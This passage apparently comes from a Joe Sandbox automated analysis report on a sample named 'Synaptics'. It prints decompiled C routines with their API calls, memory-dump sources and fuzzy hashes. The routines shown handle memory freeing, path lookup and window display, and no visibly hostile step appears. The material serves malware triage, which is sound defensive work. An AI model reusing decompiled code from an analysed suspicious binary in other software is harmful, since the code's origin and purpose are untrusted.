                                                                                                                                                                                                                            				_t22 = __eax + __edx & 0xfffff000;
                                                                                                                                                                                                                            				 *__ecx =  *_t23;
                                                                                                                                                                                                                            				_t7 = _t22 -  *_t23;
                                                                                                                                                                                                                            				__ecx[1] = _t7;
                                                                                                                                                                                                                            				_t19 =  *0x49e5ec; // 0x653adc
                                                                                                                                                                                                                            				while(_t19 != 0x49e5ec) {
                                                                                                                                                                                                                            					_t9 =  *(_t19 + 8);
                                                                                                                                                                                                                            					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
                                                                                                                                                                                                                            					if(_t9 <  *_t23) {
                                                                                                                                                                                                                            						_t9 =  *_t23;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t22 < _t14) {
                                                                                                                                                                                                                            						_t14 = _t22;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_t14 > _t9) {
                                                                                                                                                                                                                            						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
                                                                                                                                                                                                                            						if(_t7 == 0) {
                                                                                                                                                                                                                            							 *0x49e5c8 = 2;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t19 =  *_t19;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401A43), ref: 00401836
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                            • Opcode ID: ba7e8f56dd9b63abe11c00bb54b2c9e598e0cb71057fa30d3871cf01dbab3387
                                                                                                                                                                                                                            • Instruction ID: 69a851a612f8e5332c3ed32b0bddb0d6c77ed4967d0166fa3b232cf3dee9e35f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba7e8f56dd9b63abe11c00bb54b2c9e598e0cb71057fa30d3871cf01dbab3387
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4201FC73A043105BD310EE59DCC0A1777E8E795338F15853ED98467391D33AAD0187D8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004099D8(void* __eax) {
                                                                                                                                                                                                                            				int _t2;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t2 = CloseHandle(__eax); // executed
                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                            0x004099d9
                                                                                                                                                                                                                            0x004099de

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                            • Opcode ID: 7f9678bbb8944c457b7ab340dcaecd9d84314f50dba63ffaf464203f7de856ab
                                                                                                                                                                                                                            • Instruction ID: ceb54ecbe242fc00ff43e0d48e9a5ccb5d75668868478bddb86d82c62ad848b3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f9678bbb8944c457b7ab340dcaecd9d84314f50dba63ffaf464203f7de856ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E00406018(char* __eax, intOrPtr __edx) {
                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v334;
                                                                                                                                                                                                                            				char _v595;
                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                            				char* _t54;
                                                                                                                                                                                                                            				char* _t64;
                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                            				char* _t90;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t91;
                                                                                                                                                                                                                            				char* _t93;
                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                            				char* _t95;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_v16 = _v8;
                                                                                                                                                                                                                            				_t91 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                                                            				if(_t91 == 0) {
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					if( *_v8 != 0x5c) {
                                                                                                                                                                                                                            						_t93 = _v8 + 2;
                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                                                                                                                                                                                            							_t95 = E00406004(_v8 + 2);
                                                                                                                                                                                                                            							if( *_t95 != 0) {
                                                                                                                                                                                                                            								_t14 = _t95 + 1; // 0x1
                                                                                                                                                                                                                            								_t93 = E00406004(_t14);
                                                                                                                                                                                                                            								if( *_t93 != 0) {
                                                                                                                                                                                                                            									L10:
                                                                                                                                                                                                                            									_t83 = _t93 - _v8;
                                                                                                                                                                                                                            									_push(_t83 + 1);
                                                                                                                                                                                                                            									_push(_v8);
                                                                                                                                                                                                                            									_push( &_v595);
                                                                                                                                                                                                                            									L0040131C();
                                                                                                                                                                                                                            									while( *_t93 != 0) {
                                                                                                                                                                                                                            										_t90 = E00406004(_t93 + 1);
                                                                                                                                                                                                                            										_t45 = _t90 - _t93;
                                                                                                                                                                                                                            										if(_t45 + _t83 + 1 <= 0x105) {
                                                                                                                                                                                                                            											_push(_t45 + 1);
                                                                                                                                                                                                                            											_push(_t93);
                                                                                                                                                                                                                            											_push( &(( &_v595)[_t83]));
                                                                                                                                                                                                                            											L0040131C();
                                                                                                                                                                                                                            											_t94 = FindFirstFileA( &_v595,  &_v334);
                                                                                                                                                                                                                            											if(_t94 != 0xffffffff) {
                                                                                                                                                                                                                            												FindClose(_t94);
                                                                                                                                                                                                                            												_t54 =  &(_v334.cFileName);
                                                                                                                                                                                                                            												_push(_t54);
                                                                                                                                                                                                                            												L00401324();
                                                                                                                                                                                                                            												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                                                                                                                                                                                                            													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                                                                                                                                                                                            													_push(0x105 - _t83 - 1);
                                                                                                                                                                                                                            													_push( &(_v334.cFileName));
                                                                                                                                                                                                                            													_push( &(( &(( &_v595)[_t83]))[1]));
                                                                                                                                                                                                                            													L0040131C();
                                                                                                                                                                                                                            													_t64 =  &(_v334.cFileName);
                                                                                                                                                                                                                            													_push(_t64);
                                                                                                                                                                                                                            													L00401324();
                                                                                                                                                                                                                            													_t83 = _t83 + _t64 + 1;
                                                                                                                                                                                                                            													_t93 = _t90;
                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_push(_v12);
                                                                                                                                                                                                                            									_push( &_v595);
                                                                                                                                                                                                                            									_push(_v8);
                                                                                                                                                                                                                            									L0040131C();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(0x105);
                                                                                                                                                                                                                            						_push( &_v595);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						if( *_t84() == 0) {
                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_push(_v12);
                                                                                                                                                                                                                            							_push( &_v595);
                                                                                                                                                                                                                            							_push(_v8);
                                                                                                                                                                                                                            							L0040131C();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L17:
                                                                                                                                                                                                                            				return _v16;
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,?,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5), ref: 00406122
                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000), ref: 0040612F
                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278), ref: 0040613B
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                                                                                                                                                                                            • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                                                                                                                                                                                            • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                            • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                                                            • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0045695C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				intOrPtr _t149;
                                                                                                                                                                                                                            				intOrPtr _t154;
                                                                                                                                                                                                                            				intOrPtr _t155;
                                                                                                                                                                                                                            				intOrPtr _t160;
                                                                                                                                                                                                                            				intOrPtr _t162;
                                                                                                                                                                                                                            				intOrPtr _t163;
                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                            				struct HWND__* _t166;
                                                                                                                                                                                                                            				long _t176;
                                                                                                                                                                                                                            				signed int _t198;
                                                                                                                                                                                                                            				signed int _t199;
                                                                                                                                                                                                                            				long _t220;
                                                                                                                                                                                                                            				intOrPtr _t226;
                                                                                                                                                                                                                            				int _t231;
                                                                                                                                                                                                                            				intOrPtr _t232;
                                                                                                                                                                                                                            				intOrPtr _t241;
                                                                                                                                                                                                                            				intOrPtr _t245;
                                                                                                                                                                                                                            				signed int _t248;
                                                                                                                                                                                                                            				intOrPtr _t251;
                                                                                                                                                                                                                            				intOrPtr _t252;
                                                                                                                                                                                                                            				signed int _t258;
                                                                                                                                                                                                                            				long _t259;
                                                                                                                                                                                                                            				intOrPtr _t262;
                                                                                                                                                                                                                            				intOrPtr _t266;
                                                                                                                                                                                                                            				signed int _t269;
                                                                                                                                                                                                                            				intOrPtr _t270;
                                                                                                                                                                                                                            				intOrPtr _t271;
                                                                                                                                                                                                                            				signed int _t277;
                                                                                                                                                                                                                            				long _t278;
                                                                                                                                                                                                                            				intOrPtr _t281;
                                                                                                                                                                                                                            				signed int _t286;
                                                                                                                                                                                                                            				signed int _t287;
                                                                                                                                                                                                                            				long _t290;
                                                                                                                                                                                                                            				intOrPtr _t294;
                                                                                                                                                                                                                            				struct HWND__* _t299;
                                                                                                                                                                                                                            				signed int _t301;
                                                                                                                                                                                                                            				signed int _t302;
                                                                                                                                                                                                                            				signed int _t305;
                                                                                                                                                                                                                            				signed int _t307;
                                                                                                                                                                                                                            				long _t308;
                                                                                                                                                                                                                            				signed int _t311;
                                                                                                                                                                                                                            				signed int _t313;
                                                                                                                                                                                                                            				long _t314;
                                                                                                                                                                                                                            				signed int _t317;
                                                                                                                                                                                                                            				signed int _t318;
                                                                                                                                                                                                                            				signed int _t326;
                                                                                                                                                                                                                            				long _t328;
                                                                                                                                                                                                                            				intOrPtr _t331;
                                                                                                                                                                                                                            				intOrPtr _t362;
                                                                                                                                                                                                                            				long _t370;
                                                                                                                                                                                                                            				void* _t372;
                                                                                                                                                                                                                            				void* _t373;
                                                                                                                                                                                                                            				intOrPtr _t374;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t372 = _t373;
                                                                                                                                                                                                                            				_t374 = _t373 + 0xfffffff8;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				_push(_t372);
                                                                                                                                                                                                                            				_push(0x456ec6);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t374;
                                                                                                                                                                                                                            				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
                                                                                                                                                                                                                            					_t294 =  *0x49de28; // 0x422f40
                                                                                                                                                                                                                            					E00406A70(_t294,  &_v12);
                                                                                                                                                                                                                            					E0040D144(_v12, 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t149 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            				E0045B100(_t149);
                                                                                                                                                                                                                            				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
                                                                                                                                                                                                                            				_push(_t372);
                                                                                                                                                                                                                            				_push(0x456ea9);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t374;
                                                                                                                                                                                                                            				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                                                                                                                                                                                                            					_t155 = _v8;
                                                                                                                                                                                                                            					_t378 =  *((char*)(_t155 + 0x1a6));
                                                                                                                                                                                                                            					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                                                                                                                                                                                                            						_push(_t372);
                                                                                                                                                                                                                            						_push(0x456db0);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t374;
                                                                                                                                                                                                                            						E00403DE8(_v8, __eflags);
                                                                                                                                                                                                                            						 *[fs:eax] = 0;
                                                                                                                                                                                                                            						_t160 =  *0x49ebbc; // 0x21e1320
                                                                                                                                                                                                                            						_t127 = _t160 + 0x6c; // 0x0
                                                                                                                                                                                                                            						__eflags =  *_t127 - _v8;
                                                                                                                                                                                                                            						if( *_t127 == _v8) {
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							E00455B08(_v8, 0);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t162 = _v8;
                                                                                                                                                                                                                            						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                                                                                                                                                                                                            						if( *((char*)(_t162 + 0x22f)) != 1) {
                                                                                                                                                                                                                            							_t163 = _v8;
                                                                                                                                                                                                                            							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
                                                                                                                                                                                                                            							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
                                                                                                                                                                                                                            								_t299 = 0;
                                                                                                                                                                                                                            								_t165 = E00441704(_v8);
                                                                                                                                                                                                                            								_t166 = GetActiveWindow();
                                                                                                                                                                                                                            								__eflags = _t165 - _t166;
                                                                                                                                                                                                                            								if(_t165 == _t166) {
                                                                                                                                                                                                                            									_t176 = IsIconic(E00441704(_v8));
                                                                                                                                                                                                                            									__eflags = _t176;
                                                                                                                                                                                                                            									if(_t176 == 0) {
                                                                                                                                                                                                                            										_t299 = E00451750(E00441704(_v8));
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t299;
                                                                                                                                                                                                                            								if(_t299 == 0) {
                                                                                                                                                                                                                            									ShowWindow(E00441704(_v8), 0);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                                                                                                                                                                            									SetActiveWindow(_t299);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E0043EC5C(_v8);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push(_t372);
                                                                                                                                                                                                                            						_push(0x456a14);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t374;
                                                                                                                                                                                                                            						E00403DE8(_v8, _t378);
                                                                                                                                                                                                                            						 *[fs:eax] = 0;
                                                                                                                                                                                                                            						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                                                                                                                                                                                                            							if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                                                                                                                                                                            								_t301 = E004581F4() -  *(_v8 + 0x48);
                                                                                                                                                                                                                            								__eflags = _t301;
                                                                                                                                                                                                                            								_t302 = _t301 >> 1;
                                                                                                                                                                                                                            								if(_t301 < 0) {
                                                                                                                                                                                                                            									asm("adc ebx, 0x0");
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t198 = E004581E8() -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            								__eflags = _t198;
                                                                                                                                                                                                                            								_t199 = _t198 >> 1;
                                                                                                                                                                                                                            								if(_t198 < 0) {
                                                                                                                                                                                                                            									asm("adc eax, 0x0");
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t241 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            								_t31 = _t241 + 0x44; // 0x21e2354
                                                                                                                                                                                                                            								_t305 = E0043A980( *_t31) -  *(_v8 + 0x48);
                                                                                                                                                                                                                            								_t302 = _t305 >> 1;
                                                                                                                                                                                                                            								if(_t305 < 0) {
                                                                                                                                                                                                                            									asm("adc ebx, 0x0");
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t245 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            								_t34 = _t245 + 0x44; // 0x21e2354
                                                                                                                                                                                                                            								_t248 = E0043A9C4( *_t34) -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            								_t199 = _t248 >> 1;
                                                                                                                                                                                                                            								if(_t248 < 0) {
                                                                                                                                                                                                                            									asm("adc eax, 0x0");
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_t302 < 0) {
                                                                                                                                                                                                                            								_t302 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(_t199 < 0) {
                                                                                                                                                                                                                            								_t199 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t326 = _t199;
                                                                                                                                                                                                                            							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                                                                                                                                                            							if( *((char*)(_v8 + 0x57)) != 0) {
                                                                                                                                                                                                                            								E00454DB8(_v8, _t326);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                                                                                                                                                                                                            							__eflags = _t251 + 0xfa - 2;
                                                                                                                                                                                                                            							if(_t251 + 0xfa - 2 >= 0) {
                                                                                                                                                                                                                            								__eflags = _t251 - 5;
                                                                                                                                                                                                                            								if(_t251 == 5) {
                                                                                                                                                                                                                            									_t252 = _v8;
                                                                                                                                                                                                                            									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                                                                                                                                                                                                            									if( *((char*)(_t252 + 0x22f)) != 1) {
                                                                                                                                                                                                                            										_t307 = E00458224() -  *(_v8 + 0x48);
                                                                                                                                                                                                                            										__eflags = _t307;
                                                                                                                                                                                                                            										_t308 = _t307 >> 1;
                                                                                                                                                                                                                            										if(_t307 < 0) {
                                                                                                                                                                                                                            											asm("adc ebx, 0x0");
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t258 = E00458218() -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            										__eflags = _t258;
                                                                                                                                                                                                                            										_t259 = _t258 >> 1;
                                                                                                                                                                                                                            										if(_t258 < 0) {
                                                                                                                                                                                                                            											asm("adc eax, 0x0");
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_t262 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            										_t82 = _t262 + 0x44; // 0x21e2354
                                                                                                                                                                                                                            										_t311 = E0043A980( *_t82) -  *(_v8 + 0x48);
                                                                                                                                                                                                                            										__eflags = _t311;
                                                                                                                                                                                                                            										_t308 = _t311 >> 1;
                                                                                                                                                                                                                            										if(_t311 < 0) {
                                                                                                                                                                                                                            											asm("adc ebx, 0x0");
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t266 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            										_t85 = _t266 + 0x44; // 0x21e2354
                                                                                                                                                                                                                            										_t269 = E0043A9C4( *_t85) -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            										__eflags = _t269;
                                                                                                                                                                                                                            										_t259 = _t269 >> 1;
                                                                                                                                                                                                                            										if(_t269 < 0) {
                                                                                                                                                                                                                            											asm("adc eax, 0x0");
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags = _t308;
                                                                                                                                                                                                                            									if(_t308 < 0) {
                                                                                                                                                                                                                            										_t308 = 0;
                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags = _t259;
                                                                                                                                                                                                                            									if(_t259 < 0) {
                                                                                                                                                                                                                            										_t259 = 0;
                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t270 =  *0x49ebb8; // 0x21e1714
                                                                                                                                                                                                                            								_t52 = _t270 + 0x44; // 0x21e2354
                                                                                                                                                                                                                            								_t370 =  *_t52;
                                                                                                                                                                                                                            								_t271 = _v8;
                                                                                                                                                                                                                            								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                                                                                                                                                                                                            								if( *((char*)(_t271 + 0x230)) == 7) {
                                                                                                                                                                                                                            									_t362 =  *0x44ff0c; // 0x44ff58
                                                                                                                                                                                                                            									_t290 = E00403D78( *(_v8 + 4), _t362);
                                                                                                                                                                                                                            									__eflags = _t290;
                                                                                                                                                                                                                            									if(_t290 != 0) {
                                                                                                                                                                                                                            										_t370 =  *(_v8 + 4);
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t370;
                                                                                                                                                                                                                            								if(_t370 == 0) {
                                                                                                                                                                                                                            									_t313 = E004581F4() -  *(_v8 + 0x48);
                                                                                                                                                                                                                            									__eflags = _t313;
                                                                                                                                                                                                                            									_t314 = _t313 >> 1;
                                                                                                                                                                                                                            									if(_t313 < 0) {
                                                                                                                                                                                                                            										asm("adc ebx, 0x0");
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t277 = E004581E8() -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            									__eflags = _t277;
                                                                                                                                                                                                                            									_t278 = _t277 >> 1;
                                                                                                                                                                                                                            									if(_t277 < 0) {
                                                                                                                                                                                                                            										asm("adc eax, 0x0");
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t59 = _t370 + 0x48; // 0x115
                                                                                                                                                                                                                            									_t317 =  *_t59 -  *(_v8 + 0x48);
                                                                                                                                                                                                                            									__eflags = _t317;
                                                                                                                                                                                                                            									_t318 = _t317 >> 1;
                                                                                                                                                                                                                            									if(_t317 < 0) {
                                                                                                                                                                                                                            										asm("adc ebx, 0x0");
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t62 = _t370 + 0x40; // 0xf6
                                                                                                                                                                                                                            									_t314 = _t318 +  *_t62;
                                                                                                                                                                                                                            									_t63 = _t370 + 0x4c; // 0x17d
                                                                                                                                                                                                                            									_t286 =  *_t63 -  *(_v8 + 0x4c);
                                                                                                                                                                                                                            									__eflags = _t286;
                                                                                                                                                                                                                            									_t287 = _t286 >> 1;
                                                                                                                                                                                                                            									if(_t286 < 0) {
                                                                                                                                                                                                                            										asm("adc eax, 0x0");
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t66 = _t370 + 0x44; // 0x72
                                                                                                                                                                                                                            									_t278 = _t287 +  *_t66;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t314;
                                                                                                                                                                                                                            								if(_t314 < 0) {
                                                                                                                                                                                                                            									_t314 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t278;
